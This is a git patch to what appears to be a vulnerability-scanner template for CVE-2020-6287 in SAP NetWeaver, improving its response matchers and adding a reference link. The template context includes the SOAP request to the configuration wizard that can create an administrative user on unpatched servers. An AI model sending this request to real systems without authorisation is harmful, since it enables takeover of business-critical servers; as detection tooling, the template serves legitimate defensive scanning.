From 55c0e1b103348ded152698f426b1c3db5534b708 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Sat, 5 Jun 2021 10:29:59 +0530
Subject: [PATCH] Improved matchers for CVE-2020-6287

---
 cves/2020/CVE-2020-6287.yaml | 10 ++++++++--
 1 file changed, 8 insertions(+), 2 deletions(-)

diff --git a/cves/2020/CVE-2020-6287.yaml b/cves/2020/CVE-2020-6287.yaml
index 2d5c79bace..e33fc9bba9 100644
--- a/cves/2020/CVE-2020-6287.yaml
+++ b/cves/2020/CVE-2020-6287.yaml
@@ -1,7 +1,7 @@
 id: CVE-2020-6287
 
 info:
-  name: Create an Administrative User in SAP NetWeaver AS JAVA (LM Configuration Wizard)
+  name: Remotely Exploitable Code On NetWeaver
   author: dwisiswant0
   severity: critical
   tags: cve,cve2020,sap
@@ -11,6 +11,7 @@ info:
     - https://launchpad.support.sap.com/#/notes/2934135
     - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675
     - https://www.onapsis.com/recon-sap-cyber-security-vulnerability
+    - https://github.com/chipik/SAP_RECON
 
 requests:
   - payloads:
@@ -23,12 +24,16 @@ requests:
         Connection: close
 
         <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>{{base64('§data§')}}</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>
+
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "urn:CTCWebServiceSi"
+          - "CTCWebServiceSi"
+          - "SOAP-ENV"
         part: body
+        condition: and
+
       - type: status
         status:
           - 200
@@ -36,4 +41,5 @@ requests:
       - type: word
         words:
           - "text/xml"
+          - "SAP NetWeaver Application Server"
         part: header
\ No newline at end of file